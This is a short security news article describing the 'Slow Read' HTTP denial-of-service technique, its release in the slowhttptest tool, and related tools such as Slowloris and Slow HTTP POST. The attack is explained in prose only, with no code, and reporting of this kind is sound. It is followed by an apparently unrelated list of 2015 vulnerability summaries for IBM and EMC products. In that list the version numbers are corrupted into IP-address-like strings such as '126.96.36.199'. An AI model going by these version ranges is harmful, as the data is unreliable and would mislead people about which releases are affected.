New Denial Of Service Attack Cripples Servers Slowly
'Slow Read' proof-of-concept and tool released Thursday.
A researcher Thursday published proof-of-concept code that takes a different spin on the slow HTTP denial-of-service (DoS) attack simply by dragging out the process of reading the server's response--and ultimately overwhelming it.
Sergey Shekyan, senior software engineer with Qualys, also has added this new so-called Slow Read attack to his open-source slowhttptest tool.
Slow Read basically sends a legitimate HTTP request and then very slowly reads the response, thus keeping as many open connections as possible and eventually causing a DoS.
Shekyan's Slowhttptest attack tool initially was inspired by related open-source tools Slowloris and OWASP's Slow HTTP Post. Slowloris keeps connections open by sending partial HTTP requests and sends headers at regular intervals to prevent the sockets from closing, while the Slow HTTP POST distributed DoS (DDoS) tool simulates an attack using POST headers with a legitimate "content-length" field that lets the Web server know how much data is arriving. Once the headers are sent, the POST message body is transmitted slowly, thus gridlocking the connection and server resources.
Slow HTTP attacks are gaining in popularity among the bad guys as a way to quietly wage a DoS attack because these exploits are relatively easy to perform, require minimal computing resources, and often are tough to detect until it's too late.
Published: 2015-06-29 CRLF injection vulnerability in IBM WebSphere Commerce 6.0 through 126.96.36.199 and 7.0 before 188.8.131.52 Cumulative iFix 2 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a crafted URL.
Published: 2015-06-29 EMC Unisphere for VMAX 8.x before 184.108.40.206 sets up the Java Debugging Wire Protocol (JDWP) service, which allows remote attackers to execute arbitrary code via unspecified vectors.
Published: 2015-06-29 IBM InfoSphere DataStage 8.1, 8.5, 8.7, 9.1, and 11.3 through 220.127.116.11 on UNIX allows local users to write to executable files, and consequently obtain root privileges, via unspecified vectors.
Published: 2015-06-28 IBM Unified Extensible Firmware Interface (UEFI) on Flex System x880 X6, System x3850 X6, and System x3950 X6 devices allows remote authenticated users to cause an unspecified temporary denial of service by using privileged access to enable a legacy boot mode.